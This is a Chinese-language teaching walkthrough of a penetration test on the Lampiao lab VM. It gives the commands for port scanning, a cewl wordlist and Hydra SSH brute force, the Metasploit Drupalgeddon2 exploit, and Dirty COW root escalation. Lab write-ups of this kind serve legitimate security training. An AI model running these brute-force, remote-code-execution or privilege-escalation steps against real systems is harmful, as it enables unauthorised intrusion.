Lampiao靶机渗透测试教学文档

环境配置

• 攻击机：Kali Linux (IP: 192.168.21.129)
• 靶机：Lampiao (IP: 192.168.21.145)

信息收集阶段

1. 确定靶机IP

使用以下命令扫描网段确定靶机IP：

nmap 192.168.21.129/24
# 或
arp-scan -l

2. 端口扫描与服务识别

nmap 192.168.21.145 -p- -sV

参数说明：

• -p-：扫描全端口(1-65535)
• -sV：探测服务版本

扫描结果：

• 开放端口：80、1898、22

攻击方法一：利用字典爆破SSH获取shell

1. Web信息收集

访问1898端口的Web服务，发现：

• 登录框尝试SQL注入无果
• 发现两个可点击链接(80端口无内容)
• 第二个链接URL类似.../1和.../3，尝试修改为.../2发现m4a音频文件和照片
• 访问音频文件http://192.168.21.145:1898/audio.m4a，听到用户名"tiago"

2. 使用cewl生成字典

cewl http://192.168.21.145 -w 1.txt

参数说明：

• -w：将结果保存到指定文件

3. 使用Hydra爆破SSH

hydra -l tiago -P 1.txt 192.168.21.145 ssh

参数说明：

• -l：指定用户名
• -P：指定密码字典文件

4. SSH登录验证

ssh tiago@192.168.21.145

攻击方法二：使用Metasploit获取shell

1. 目录扫描

dirsearch -u http://192.168.21.145:1898

发现/CHANGELOG.txt文件，显示CMS为Drupal 7.54

2. 搜索相关漏洞

Drupal 7.54存在远程代码执行漏洞(CVE-2018-7600)

3. 使用Metasploit攻击

msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhost 192.168.21.145
set rport 1898
run

提权阶段

1. 检测提权可能性

上传Linux内核漏洞检测脚本：

upload /path/to/linux-exploit-suggester /tmp

在靶机上：

cd /tmp
chmod +x linux-exploit-suggester
./linux-exploit-suggester

检测结果：存在脏牛(Dirty COW)提权漏洞(CVE-2016-5195)

2. 利用脏牛漏洞提权

下载exp脚本：
https://github.com/gbonacini/CVE-2016-5195

上传并编译：

upload /root/dcow.cpp /tmp/dcow.cpp
cd /tmp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

执行提权：

python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

工具总结

1. cewl：网站字典生成工具
2. nmap：主机发现、端口扫描、服务识别
3. Hydra：账号密码爆破工具
4. Metasploit Framework：漏洞利用框架
5. dirsearch：Web目录扫描工具
6. linux-exploit-suggester：Linux内核漏洞检测脚本(需自行下载)
7. Dirty COW exploit：脏牛漏洞利用工具(需自行下载)

攻击思路总结

1. 扫描端口服务，识别开放的服务和版本
2. 访问Web服务，寻找功能点和信息泄露
3. 方法一：
   • 通过音频文件获取用户名
   • 使用cewl生成字典
   • 爆破SSH获取shell
4. 方法二：
   • 目录扫描发现CMS版本信息
   • 搜索已知漏洞
   • 使用Metasploit利用漏洞获取shell
5. 提权：
   • 检查简单提权方式(sudo、suid等)
   • 使用漏洞检测工具识别内核漏洞
   • 下载并编译exp脚本进行提权